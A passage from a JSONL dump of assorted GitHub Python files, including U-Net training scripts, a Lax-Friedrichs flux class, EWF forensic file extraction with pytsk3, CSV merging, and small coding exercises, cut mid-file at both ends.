Utterance(\r\n text=text, audio_path=wav_path, speaker=speaker, speaker_id=speaker_id\r\n )\r\n\r\n\r\ndef mycroft_dataset(\r\n dataset_dir: Path, is_single_speaker: bool, speaker_id: Optional[int] = None\r\n) -> Iterable[Utterance]:\r\n speaker_id = 0\r\n for metadata_path in dataset_dir.glob(\"**/*-metadata.txt\"):\r\n speaker = metadata_path.parent.name if not is_single_speaker else None\r\n with open(metadata_path, \"r\", encoding=\"utf-8\") as csv_file:\r\n # filename|text|length\r\n reader = csv.reader(csv_file, delimiter=\"|\")\r\n for row in reader:\r\n filename, text = row[0], row[1]\r\n wav_path = metadata_path.parent / filename\r\n yield Utterance(\r\n text=text,\r\n audio_path=wav_path,\r\n speaker=speaker,\r\n speaker_id=speaker_id if not is_single_speaker else None,\r\n )\r\n speaker_id += 1\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\n\r\ndef batched(iterable, n):\r\n \"Batch data into lists of length n. The last batch may be shorter.\"\r\n # batched('ABCDEFG', 3) --> ABC DEF G\r\n if n < 1:\r\n raise ValueError(\"n must be at least one\")\r\n it = iter(iterable)\r\n batch = list(itertools.islice(it, n))\r\n while batch:\r\n yield batch\r\n batch = list(itertools.islice(it, n))\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"athenasaurav/piper","sub_path":"src/python/piper_train/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":11210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42846697373","text":"import numpy as np\nfrom abc import abstractmethod\nfrom discontinuous_galerkin.base.base_numerical_flux import BaseNumericalFlux\nimport pdb\n\nclass LaxFriedrichsFlux(BaseNumericalFlux):\n \"\"\"\n Lax-Friedrichs numerical flux class.\n \n This class contains the functionality for the Lax-Friedrichs numerical flux. \n \"\"\"\n def __init__(self, DG_vars, alpha=0.5, velocity=lambda q: np.abs(q)):\n \"\"\"Initialize the class.\"\"\"\n\n super(LaxFriedrichsFlux).__init__()\n\n self.DG_vars = DG_vars\n self.alpha = alpha\n self.velocity = velocity\n\n self.nx_boundary = np.array(\n [self.DG_vars.nx[self.DG_vars.mapI], self.DG_vars.nx[self.DG_vars.mapO]]\n )\n \n def _average_operator(self, q_inside, q_outside):\n \"\"\"Compute the average operator.\"\"\"\n\n return (q_inside + q_outside) / 2\n\n def _jump_operator(self, q_inside, q_outside):\n \"\"\"Compute the jump operator.\"\"\"\n\n return self.DG_vars.nx * (q_inside - q_outside)\n \n def _boundary_jump_operator(self, q_inside, q_outside):\n \"\"\"Compute the jump operator on the boundary.\"\"\"\n\n return self.nx_boundary * (q_inside - q_outside)\n\n def compute_numerical_flux(\n self, \n q_inside, \n q_outside, \n flux_inside, \n flux_outside,\n on_boundary=False,\n primitive_to_conservative=None,\n BC_state_or_flux=None\n ):\n \"\"\"Compute the numerical flux.\"\"\"\n\n if primitive_to_conservative is not None:\n q_inside = primitive_to_conservative(q_inside)\n q_outside = primitive_to_conservative(q_outside)\n\n # Compute the velocity\n C_inside = self.velocity(q_inside)\n C_outside = self.velocity(q_outside)\n C = np.maximum(np.abs(C_inside), np.abs(C_outside))\n\n # Compute the average of the fluxes\n flux_average = self._average_operator(flux_inside, flux_outside)\n\n if on_boundary:\n\n numerical_flux = flux_average\n for i, side in enumerate(['left', 'right']):\n if BC_state_or_flux[side] == 'flux':\n numerical_flux[:, i] = flux_outside[:, i]\n else:\n q_jump = self._boundary_jump_operator(q_inside, q_outside)\n numerical_flux[:, i] += C[i] * 0.5 * (1 - self.alpha) * q_jump[:, i]\n else:\n q_jump = self._jump_operator(q_inside, q_outside)\n\n # Compute the numerical flux\n numerical_flux = flux_average + C * 0.5 * (1 - self.alpha) * q_jump\n \n return numerical_flux\n\n","repo_name":"nmucke/discontinuous-galerkin","sub_path":"src/discontinuous_galerkin/numerical_fluxes/lax_friedrichs.py","file_name":"lax_friedrichs.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"7244945321","text":"import argparse\r\nimport logging\r\nimport os\r\nimport sys\r\n\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch import optim\r\n\r\nfrom model import UNet\r\nfrom eval_net import eval_net\r\nfrom BLR import ImgWtLossSoftNLL\r\nimport torch.nn.functional as F\r\n\r\n# from torch.utils.tensorboard import SummaryWriter\r\nfrom dataset import BasicDataset\r\nfrom torch.utils.data import DataLoader, random_split\r\n\r\ndir_img = r\"D:\\BaiduNetdiskDownload\\gen_img\"\r\ndir_mask = r\"D:\\BaiduNetdiskDownload\\gen_mask\"\r\ndir_checkpoint = r\"D:\\PycharmsProjects\\UNET+BLR\\checkPoints\"\r\n\r\nclasses = 5\r\nepochs = 5\r\nglobal_step = 0\r\nbatch_size = 4\r\nlr = 0.001\r\n\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\ndataset = BasicDataset(dir_img, dir_mask)\r\nn_val = int(len(dataset) * 0.1)\r\nn_train = len(dataset) - n_val\r\ntrain, val = random_split(dataset, [n_train, n_val])\r\ntrain_loader = DataLoader(train, batch_size=batch_size, shuffle=True)\r\nval_loader = DataLoader(val, batch_size=batch_size, shuffle=False)\r\n\r\n# writer = SummaryWriter(comment=f'LR_{lr}_BS_{batch_size}_SCALE_{1}')\r\n\r\nnet = UNet(n_channels=3, n_classes=classes, bilinear=True)\r\nnet = net.cuda()\r\n\r\noptimizer = optim.Adam(net.parameters(), lr=lr, weight_decay=1e-8)\r\nscheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min' if net.n_classes > 1 else 'max', patience=2)\r\n\r\ncriterion = ImgWtLossSoftNLL(classes, epochs).cuda()\r\ncriterion_ = nn.CrossEntropyLoss().cuda()\r\n\r\n\r\nfor epoch in range(epochs):\r\n epoch_loss = 0.0\r\n for batch in train_loader:\r\n imgs = batch['image']\r\n # print(imgs.size())\r\n true_masks = batch['mask']\r\n # print(true_masks.size())\r\n imgs = imgs.to(device=device, dtype=torch.float32)\r\n mask_type = torch.float32 if net.n_classes == 1 else torch.long\r\n true_masks = true_masks.to(device=device, dtype=mask_type)\r\n\r\n masks_pred = net(imgs)\r\n # masks_pred = masks_pred.to(\"cpu\", torch.double)\r\n # print(masks_pred.size())\r\n\r\n loss = criterion(masks_pred, true_masks)\r\n # loss = criterion_(masks_pred, true_masks)\r\n # print(\"###########\")\r\n # print(loss.item())\r\n epoch_loss += loss.item()\r\n # writer.add_scalar('Loss/train', loss.item(), global_step)\r\n\r\n print(\"epoch : %d, batch : %5d, loss : %.5f\" % (epoch, (global_step / batch_size), loss.item()))\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n global_step += 1\r\n if global_step // 1000 == 0 and global_step > 1000:\r\n val_pre = eval_net(net, val_loader, device)\r\n print(\"val loss : %.5f\" % val_pre)\r\n\r\n if epoch % 10 == 0 and epoch > 0:\r\n torch.save(net.state_dict(), dir_checkpoint + f'epoch_%d.pth' % epoch)\r\n","repo_name":"uptownfunkmars/Improved-Unet-Used-Boundary-Relax-Loss","sub_path":"unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"30889394338","text":"from typing import List, NamedTuple, Optional\n\nfrom paas_wl.infras.cluster.models import IngressConfig\nfrom paas_wl.infras.cluster.shim import EnvClusterService\nfrom paas_wl.workloads.networking.entrance.allocator.domains import Domain, SubDomainAllocator\nfrom paasng.platform.engine.constants import AppEnvName\nfrom paasng.platform.applications.models import ModuleEnvironment\n\n\nclass PreDomains(NamedTuple):\n \"\"\"Preallocated domains, include both environments\"\"\"\n\n stag: Domain\n prod: Domain\n\n\ndef get_preallocated_domains_by_env(env: ModuleEnvironment) -> List[Domain]:\n \"\"\"Get all pre-allocated domains for a environment which may has not been\n deployed yet. Results length is equal to length of configured root domains.\n \"\"\"\n app = env.application\n module = env.module\n cluster = EnvClusterService(env).get_cluster()\n ingress_config = cluster.ingress_config\n\n # Iterate configured root domains, get domains\n allocator = SubDomainAllocator(app.code, ingress_config.port_map)\n results: List[Domain] = []\n for domain_cfg in ingress_config.app_root_domains:\n if not env.module.is_default:\n results.append(allocator.for_universal(domain_cfg, module.name, env.environment))\n else:\n if env.environment == AppEnvName.STAG.value:\n results.append(allocator.for_default_module(domain_cfg, 'stag'))\n else:\n results.append(allocator.for_default_module_prod_env(domain_cfg))\n return results\n\n\ndef get_preallocated_domain(\n app_code: str, ingress_config: IngressConfig, module_name: Optional[str] = None\n) -> Optional[PreDomains]:\n \"\"\"Get the preallocated domain for a application which was not released yet.\n\n if `module_name` was not given, the result will always use the main module.\n\n :param ingress_config: The ingress config dict\n :param module_name: Name of module, optional\n :returns: when sub domain was not configured, return None\n \"\"\"\n if not ingress_config.app_root_domains:\n return None\n\n allocator = SubDomainAllocator(app_code, ingress_config.port_map)\n domain_cfg = ingress_config.default_root_domain\n if not module_name:\n return PreDomains(\n stag=allocator.for_default_module(domain_cfg, 'stag'),\n prod=allocator.for_default_module_prod_env(domain_cfg),\n )\n else:\n return PreDomains(\n stag=allocator.for_universal(domain_cfg, module_name, 'stag'),\n prod=allocator.for_universal(domain_cfg, module_name, 'prod'),\n )\n","repo_name":"TencentBlueKing/blueking-paas","sub_path":"apiserver/paasng/paasng/accessories/publish/entrance/domains.py","file_name":"domains.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"32"} +{"seq_id":"30014291607","text":"\ndef even_or_odd(s):\n I=[int(x) for x in s]\n E=[x for x in I if x%2==0]\n O=[x for x in I if x%2]\n if sum(E)==sum(O):\n return 'Even and Odd are the same'\n elif sum(E)>sum(O):\n return 'Even is greater than Odd'\n else:\n return 'Odd is greater than Even'\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"suhHcPgaKdb9YCrve_6.py","file_name":"suhHcPgaKdb9YCrve_6.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5097526384","text":"import os\nimport pandas as pd\nfrom dateutil.relativedelta import relativedelta\n\n\ndef merge(path, dataid, start, duration):\n destination = os.path.join(os.getcwd(), 'data', 'NYISO')\n files = os.listdir(path)\n files.sort()\n\n date_list = []\n for d in range(duration):\n date = start + relativedelta(days=d)\n datestring = str(date.year) + '{:02d}'.format(date.month) + '{:02d}'.format(date.day)\n date_list.append(datestring)\n\n selected_files = []\n for f in files:\n if f[0:8] in date_list:\n selected_files.append(f)\n\n if len(selected_files[0].split('_')) > 1:\n suffix = selected_files[0].split('_')[-1].split('.')[0]\n else:\n suffix = ''\n\n combined_csv = pd.concat([pd.read_csv(os.path.join(path, f)) for f in selected_files])\n os.chdir(destination)\n if len(suffix) > 0:\n combined_csv.to_csv('{}_to_{}_{}_{}.csv'.format(date_list[0], date_list[-1], dataid, suffix), index=False)\n\n else:\n combined_csv.to_csv('{}_to_{}_{}.csv'.format(date_list[0], date_list[-1], dataid), index=False)\n","repo_name":"LLNL/ISO-DART","sub_path":"lib/framework/NYISO/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"24276311878","text":"__author__ = 'guinnc'\nclass ErrorInLine:\n 'Stores the original line, the line number, and the error message'\n\n def __init__(self, originalLine, lineNo, errorMessage):\n 'Create a rule with an optional semantics'\n self.original = originalLine\n self.lineNumber = lineNo\n self.error = errorMessage\n self.PRINTED = False\n\n def __str__(self):\n 'a pretty string form of the rule'\n return self.original# + \"\\t# \" + self.error\n","repo_name":"guinnc/LinterForMDT","sub_path":"ErrorInLine.py","file_name":"ErrorInLine.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35110077147","text":"\"\"\"\nThis module represents the Consumer.\n\nComputer Systems Architecture Course\nAssignment 1\nMarch 2021\n\"\"\"\n\nfrom threading import Thread\nfrom time import sleep\n\n\nclass Consumer(Thread):\n \"\"\"\n Class that represents a consumer.\n \"\"\"\n\n def __init__(self, carts, marketplace, retry_wait_time, **kwargs):\n \"\"\"\n Constructor.\n\n :type carts: List\n :param carts: a list of add and remove operations\n\n :type marketplace: Marketplace\n :param marketplace: a reference to the marketplace\n\n :type retry_wait_time: Time\n :param retry_wait_time: the number of seconds that a producer must wait\n until the Marketplace becomes available\n\n :type kwargs:\n :param kwargs: other arguments that are passed to the Thread's __init__()\n \"\"\"\n Thread.__init__(self, **kwargs)\n self.carts = carts\n self.marketplace = marketplace\n self.wait_time = retry_wait_time\n\n def run(self):\n for cart in self.carts:\n # inregistre fiecare cart din lista\n cart_id = self.marketplace.new_cart()\n # execut fiecare actiune din cart apeland metodele respective din marketplace\n for action in cart:\n if action['type'] == 'add':\n for _ in range(action['quantity']):\n while not self.marketplace.add_to_cart(cart_id, action['product']):\n sleep(self.wait_time)\n else:\n for _ in range(action['quantity']):\n self.marketplace.remove_from_cart(cart_id, action['product'])\n # primesc lista de produse din cart dupa executarea tuturor actiunilor\n shopping_cart = self.marketplace.place_order(cart_id)\n # o afisez cu numele consumatorului in fata\n for product in shopping_cart:\n print(self.name + \" bought \" + str(product))\n","repo_name":"alexandru-vasilescu/Marketplace-multithreading","sub_path":"skel/tema/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13975338860","text":"# Simplified unet for fault segmentation\n# The original u-net architecture is more complicated than necessary \n# for our task of fault segmentation.\n# We significanlty reduce the number of layers and features at each \n# layer to save GPU memory and computation but still preserve high \n# performace in fault segmentation.\n\nimport numpy as np \nimport os\nimport skimage.io as io\nimport skimage.transform as trans\nimport numpy as np\nfrom keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom keras import backend as keras\n\ndef unet(pretrained_weights = None,input_size = (None,None,None,1)):\n nf1 = 32\n nf2 = nf1*2\n nf3 = nf2*2\n nf4 = nf3*2\n nf5 = nf4*2\n input_img = Input(shape=input_size,name='input_image')\n conv1 = Conv3D(nf1, (3,3,3), activation='relu', padding='same')(input_img)\n conv1 = Conv3D(nf1, (3,3,3), activation='relu', padding='same')(conv1)\n pool1 = MaxPooling3D(pool_size=(2,2,2))(conv1)\n\n conv2 = Conv3D(nf2, (3,3,3), activation='relu', padding='same')(pool1)\n conv2 = Conv3D(nf2, (3,3,3), activation='relu', padding='same')(conv2)\n pool2 = MaxPooling3D(pool_size=(2,2,2))(conv2)\n\n conv3 = Conv3D(nf3, (3,3,3), activation='relu', padding='same')(pool2)\n conv3 = Conv3D(nf3, (3,3,3), activation='relu', padding='same')(conv3)\n pool3 = MaxPooling3D(pool_size=(2,2,2))(conv3)\n\n conv4 = Conv3D(nf4, (3,3,3), activation='relu', padding='same')(pool3)\n conv4 = Conv3D(nf4, (3,3,3), activation='relu', padding='same')(conv4)\n pool4 = MaxPooling3D(pool_size=(2,2,2))(conv4)\n\n conv5 = Conv3D(nf5, (3,3,3), activation='relu', padding='same')(pool4)\n conv5 = Conv3D(nf5, (3,3,3), activation='relu', padding='same')(conv5)\n\n up6 = concatenate([UpSampling3D(size=(2,2,2))(conv5), conv4], axis=-1)\n conv6 = Conv3D(nf4, (3,3,3), activation='relu', padding='same')(up6)\n conv6 = Conv3D(nf4, (3,3,3), activation='relu', padding='same')(conv6)\n\n up7 = concatenate([UpSampling3D(size=(2,2,2))(conv6), conv3], axis=-1)\n conv7 = Conv3D(nf3, (3,3,3), activation='relu', padding='same')(up7)\n conv7 = Conv3D(nf3, (3,3,3), activation='relu', padding='same')(conv7)\n\n up8 = concatenate([UpSampling3D(size=(2,2,2))(conv7), conv2], axis=-1)\n conv8 = Conv3D(nf2, (3,3,3), activation='relu', padding='same')(up8)\n conv8 = Conv3D(nf2, (3,3,3), activation='relu', padding='same')(conv8)\n\n up9 = concatenate([UpSampling3D(size=(2,2,2))(conv8), conv1], axis=-1)\n conv9 = Conv3D(nf1, (3,3,3), activation='relu', padding='same')(up9)\n conv9 = Conv3D(nf1, (3,3,3), activation='relu', padding='same')(conv9)\n\n o1 = Conv3D(1, (1,1,1), activation='sigmoid',name='o1')(conv9)\n\n model = Model(inputs=input_img, outputs=o1)\n model.compile(optimizer = Adam(lr = 1e-4),loss ='binary_crossentropy', metrics = ['accuracy'])\n\n return model\n\n","repo_name":"xinwucwp/KarstSeg3D","sub_path":"unet/unet3.py","file_name":"unet3.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"40219207514","text":"\"\"\"This file contains everything related to the actual EWF\nhandling.\n\nIt opens up the image, find the NTFS image and iterates\nover file using ArtifactExtractor derived classes to extract\nuseful artifacts and pass them over to the related modules.\n\"\"\"\n\nimport os\nimport sys\nimport csv\nimport subprocess\nfrom datetime import datetime\n\nimport pytsk3\nimport pyewf\n\n# Stolen from the Python Foresics Cookbook\n# https://github.com/PacktPublishing/Python-Digital-Forensics-Cookbook\nclass EWFImgInfo(pytsk3.Img_Info):\n \"\"\"This class represents a EWF image and contains everything needed\n by the rest of the project.\"\"\"\n def __init__(self, ewf_handle):\n self._ewf_handle = ewf_handle\n super(EWFImgInfo, self).__init__(url=\"\",\n type=pytsk3.TSK_IMG_TYPE_EXTERNAL)\n\n def close(self):\n self._ewf_handle.close()\n\n def read(self, offset, size):\n self._ewf_handle.seek(offset)\n return self._ewf_handle.read(size)\n\n def get_size(self):\n return self._ewf_handle.get_media_size()\n\ndef find_file_systems(img_info: EWFImgInfo) -> list[pytsk3.FS_Info]:\n \"\"\"\n This function finds the various filesystems in a given EWF image.\n \"\"\"\n vol = pytsk3.Volume_Info(img_info)\n fs_partitions = []\n\n print(\"[+] Iterating over partitions to find NTFS file systems\\n\")\n for part in vol:\n try:\n fs_offset = part.start * vol.info.block_size\n fs = pytsk3.FS_Info(img_info, offset=fs_offset)\n fs_info = fs.info # TSK_FS_INFO\n if (fs_info.ftype != pytsk3.TSK_FS_TYPE_NTFS):\n print(\"[-] Skipping non-NTFS partition at {}\".format(fs_offset))\n continue\n print(\"[+] Found NTFS partition at offset \" + str(fs_offset))\n fs_partitions.append(fs)\n except IOError:\n _, e, _ = sys.exc_info()\n if \"file system type\" in str(e):\n print(\"[-] Unable to open FS, unrecognized type at {}\".format(fs_offset))\n continue\n\n return fs_partitions\n\n\ndef recurse_files(fs, root_dir, dirs, parent, extractors):\n \"\"\"\n This function performs a recursive search over a filesystem\n :meta private:\n \"\"\"\n dirs.append(root_dir.info.fs_file.meta.addr)\n for fs_object in root_dir:\n # Skip \".\", \"..\" or directory entries without a name.\n if not hasattr(fs_object, \"info\") or \\\n not hasattr(fs_object.info, \"name\") or \\\n not hasattr(fs_object.info.name, \"name\") or \\\n fs_object.info.name.name in [\".\", \"..\"]:\n continue\n try:\n # Set wether fs_object is file or directory\n try:\n if fs_object.info.meta.type == pytsk3.TSK_FS_META_TYPE_DIR:\n f_type = b\"DIR\"\n file_ext = b\"\"\n else:\n f_type = b\"FILE\"\n file_name = fs_object.info.name.name\n\n if b\".\" in file_name:\n file_ext = file_name.rsplit(b\".\")[-1].lower()\n else:\n file_ext = b\"\"\n\n for extractor in extractors:\n if file_name.decode(\"utf-8\").lower() in extractor.processable_file_names:\n file_path = b\"\\\\\".join(parent[1:])\n extractor.process_fs_object(fs_object, file_path)\n\n except AttributeError:\n continue\n\n if f_type == b\"DIR\" and fs_object.info.name.name != (b\"..\" or b\".\"):\n current_path = b\"\\\\\".join(parent[1:])\n folder_name = fs_object.info.name.name\n\n for extractor in extractors:\n if folder_name.decode(\"utf-8\").lower() in extractor.processable_directories:\n folder_path = b\"\\\\\".join(parent[1:])\n extractor.process_fs_object(fs_object, folder_path)\n\n # Check if any extractor's starting path starts with the current directory path\n should_recurse = (any(\n extractor.starting_path.startswith(current_path.decode(\"utf-8\").lower())\n or extractor.starting_path == \"\"\n for extractor in extractors\n ))\n\n if should_recurse:\n parent.append(fs_object.info.name.name)\n sub_directory = fs_object.as_directory()\n inode = fs_object.info.meta.addr\n\n # This ensures that we don't recurse into a directory\n # above the current level and thus avoid circular loops.\n if inode not in dirs:\n recurse_files(fs, sub_directory, dirs, parent, extractors)\n parent.pop(-1)\n\n except IOError:\n continue\n dirs.pop(-1)\n\ndef find_file(path, fs, root_dir):\n \"\"\"\n Recursively search for a file with the given path\n \"\"\"\n components = path.split(b'/')\n for fs_object in root_dir:\n if fs_object.info.name.name == components[0]:\n if len(components) == 1:\n # Found the file, return the fs_object\n return fs_object\n elif fs_object.info.meta.type == pytsk3.TSK_FS_META_TYPE_DIR:\n # Recurse into the directory\n sub_dir = fs_object.as_directory()\n inode = fs_object.info.meta.addr\n return find_file(b'/'.join(components[1:]), fs, sub_dir)\n # If we get here, the file was not found\n return None\n","repo_name":"CTM1/win_ewf_extract","sub_path":"modules/disk_utils.py","file_name":"disk_utils.py","file_ext":"py","file_size_in_byte":5612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1110954547","text":"#!/usr/bin/env python\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport dicom\n\nfrom skimage.filters import threshold_otsu\n\nmatplotlib.rcParams['font.size'] = 9\n\nds = dicom.read_file(\"/Users/Mariana/Desktop/CT-0015.dcm\")\nimage = ds.pixel_array\nthresh = threshold_otsu(image)\nbinary = image > thresh\n\nfig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(8, 2.5))\nfig = plt.figure(figsize=(8, 2.5))\nax1 = plt.subplot(1, 3, 1, adjustable='box-forced')\nax2 = plt.subplot(1, 3, 2)\nax3 = plt.subplot(1, 3, 3, sharex=ax1, sharey=ax1, adjustable='box-forced')\n\n\nax1.imshow(image, cmap=plt.cm.gray)\nax1.set_title('Original')\nax1.axis('off')\n\nax2.hist(image)\nax2.set_title('Histograma')\nax2.axvline(thresh, color='r')\n\nax3.imshow(binary, cmap=plt.cm.gray)\nax3.set_title('Threshold')\nax3.axis('off')\n\nplt.show()\n","repo_name":"marianamioto/lung-img-studies","sub_path":"old/teste3a.py","file_name":"teste3a.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30074501877","text":"\"\"\"\r\n\n\nPython offers some bit operations but not bit rotation. To complete that,\ncreate a function that takes three parameters:\n\n 1. `n`: Integer, which in binary representaion should be rotated.\n 2. `m`: Number of rotation steps that should be performed.\n 3. `d`: Boolean value; `True` = rotation right, `False` = rotation left.\n\nYour function should return an integer as a result of its rotated binary\nrepresentation.\n\n### Examples\n\n bit_rotate(8, 1, True) ➞ 4\n # 8 in bin: 1000, rotated 1 step to the right: 0100, in dec: 4\n \n bit_rotate(16, 1, False) ➞ 1\n # 16 in bin: 10000, rotated 1 step to the left: 00001, in dec: 1\n \n bit_rotate(17, 2, False) ➞ 6\n # 17 in bin: 10001, rotated 2 steps to the left: 00110, in dec: 6\n\n### Notes\n\n * For parameters use unsigned integers only.\n * There is a solution with string operations and combined bit operations.\n\n\"\"\"\r\n\ndef bit_rotate(n, m, d):\n # Get binary values (as string)\n binary = str(bin(n))[2:]\n # Get the new indexes: take into account if d = True or False\n indexes = [i%len(binary) for i in range(-len(binary)-m, 0-m)] if d else [i%len(binary) for i in range(0+m, len(binary)+m)] \n # Make the new rotated binary value based on the indexes\n rotated = \"\".join([str(binary[i]) for i in indexes])\n \n return int(rotated, 2)\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"Jjbbjqm3JuA6WnPYH_6.py","file_name":"Jjbbjqm3JuA6WnPYH_6.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2283197453","text":"import spacy, pycrfsuite, re\n\ndef create_feature(doc, i):\n token = doc[i][0]\n token_tag = doc[i][1]\n features = [\n 'token.lower=' + token.lower(),\n 'token.length=' + str(len(token)),\n 'token.isupper=%s' % token.isupper(),\n 'token.istitle=%s' % token.istitle(),\n 'token.isdigit=%s' % token.isdigit(),\n 'token.isdot=%s' % isdot(token),\n 'token_tag=%s' % token_tag,\n 'token_tag[:2]=%s' % token_tag[:2]\n ]\n if i > 0:\n last_token = doc[i-1][0]\n last_token_tag = doc[i-1][1]\n features.extend([\n '-1:token.lower=' + last_token.lower(),\n '-1:token.length=' + str(len(last_token)),\n '-1:token.isupper=%s' % last_token.isupper(),\n '-1:token.istitle=%s' % last_token.istitle(),\n '-1:token.isdigit=%s' % last_token.isdigit(),\n '-1:token.isdot=%s' % isdot(last_token),\n '-1:token_tag=%s' % last_token_tag,\n '-1:token_tag[:2]=%s' % last_token_tag[:2], \n 'last|token=%s|%s' %(last_token,token)\n ]) \n else:\n features.append('BOS') \n if i < len(doc)-1:\n next_token = doc[i+1][0]\n next_token_tag = doc[i+1][1]\n features.extend([\n '+1:token.lower=' + next_token.lower(),\n '+1:token.length=' + str(len(next_token)),\n '+1:token.isupper=%s' % next_token.isupper(),\n '+1:token.istitle=%s' % next_token.istitle(),\n '+1:token.isdigit=%s' % next_token.isdigit(),\n '+1:token.isdot=%s' % isdot(next_token),\n '+1:token_tag=%s' % next_token_tag,\n '+1:token_tag[:2]=%s' % next_token_tag[:2], \n 'token|next=%s|%s' %(token,next_token), \n ])\n else:\n features.append('EOS')\n \n if i < len(doc)-2:\n next_token = doc[i+2][0]\n next_token_tag = doc[i+2][1]\n features.extend([\n '+2:token.lower=' + next_token.lower(),\n '+2:token.length=' + str(len(next_token)),\n '+2:token.isupper=%s' % next_token.isupper(),\n '+2:token.istitle=%s' % next_token.istitle(),\n '+2:token.isdigit=%s' % next_token.isdigit(),\n '+2:token.isdot=%s' % isdot(next_token),\n '+2:token_tag=%s' % next_token_tag,\n '+2:token_tag[:2]=%s' % next_token_tag[:2]\n ]) \n if i > 1:\n next_token = doc[i-2][0]\n next_token_tag = doc[i-2][1]\n features.extend([\n '-2:token.lower=' + next_token.lower(),\n '-2:token.length=' + str(len(next_token)),\n '-2:token.isupper=%s' % next_token.isupper(),\n '-2:token.istitle=%s' % next_token.istitle(),\n '-2:token.isdigit=%s' % next_token.isdigit(),\n '-2:token.isdot=%s' % isdot(next_token),\n '-2:token_tag=%s' % next_token_tag,\n '-2:token_tag[:2]=%s' % next_token_tag[:2]\n ])\n return features\n\n\ndef isdot(word):\n return True if '.' in word else False\n\n\ndef extract_label(course):\n return [tup[2] for tup in course]\n #return [doc[2]]\n\nif __name__ == '__main__':\n nlp = spacy.load(\"en\")\n #x pos y\n data_train = []\n data_test = []\n\n with open(\"train-ashford-tag.txt\", \"r\") as train_f:\n for line in train_f: #line = course description\n course = []\n for sentence in re.split(r']+>', line):\n if not sentence.isspace():\n try:\n tags = re.findall(r'<[^>]+>', sentence)\n #print(tags[0])\n sentence = re.sub(tags[0],'',sentence.strip())\n #print(sentence)\n for w in nlp(sentence):\n course.append((w.text, w.tag_, tags[0]))\n except:\n continue\n data_train.append(course)\n \n\n X_train = [[create_feature(course, i) for i in range(len(course))] for course in data_train]\n Y_train = [extract_label(course) for course in data_train]\n # [extract_label(tuple_list) for tuple_list in data_train]\n\n\n trainer = pycrfsuite.Trainer(verbose=False)\n\n for xseq, yseq in zip(X_train, Y_train):\n trainer.append(xseq, yseq)\n\n trainer.set_params({\n 'c1': 0.1,\n 'c2': 0.01,\n 'max_iterations': 10\n #'feature.possible_transitions': True\n })\n\n trainer.train('ashford.model')\n","repo_name":"ichenY/cousrse-advisor","sub_path":"Ashford/Ashford/train_ashford.py","file_name":"train_ashford.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8902986087","text":"import os\nfrom sys import argv, getsizeof\nfrom time import time\nfrom hashlib import sha256\n\n\ndef process(directory):\n children = os.listdir(directory)\n for child in children:\n childpath = directory + \"\\\\%s\" % child\n if os.path.isdir(childpath):\n print(\"Processing directory %s\" % childpath)\n process(childpath)\n elif os.path.isfile(childpath):\n logdetails(childpath)\n\n\ndef logdetails(filepath):\n if not os.path.isfile(filepath):\n print(\"Asked to log details of something not a file, returning.\")\n print(\"Path: %s\" % filepath)\n return False\n filename = os.path.basename(filepath)\n filehash = hashfile(filepath)\n filesize = os.path.getsize(filepath)\n _files[filepath] = (filename, filehash, filesize)\n if filehash in _hashes.keys():\n _hashes[filehash].append(filepath)\n else:\n _hashes[filehash] = [filepath]\n\n\ndef hashfile(path):\n buffer_size = 65536\n shasha = sha256()\n with open(path, 'rb') as filetohash:\n while True:\n data = filetohash.read(buffer_size)\n if not data:\n break\n shasha.update(data)\n return shasha.hexdigest()\n\n\ndef distilhashes(hashes):\n newhashes = {}\n for hashvalue in hashes.keys():\n if len(hashes[hashvalue]) > 1:\n newhashes[hashvalue] = hashes[hashvalue]\n return newhashes\n\n\ndef reducetounit(number, exponent=0):\n if number < 1024:\n return \"{:,.3g}\".format(number) + \" \" + getbytesunit(exponent)\n else:\n return reducetounit(number / 1024, exponent + 1)\n\n\ndef getbytesunit(exponent):\n return {\n 0: 'bytes',\n 1: 'kB',\n 